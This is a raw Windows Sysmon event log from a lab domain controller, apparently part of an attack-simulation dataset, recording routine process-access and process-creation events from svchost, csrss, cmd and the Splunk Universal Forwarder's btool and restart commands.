13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8EDF-6005-9F00-00000000A301}45924572C:\Windows\system32\cmd.exe{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.843{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.835{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.810{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
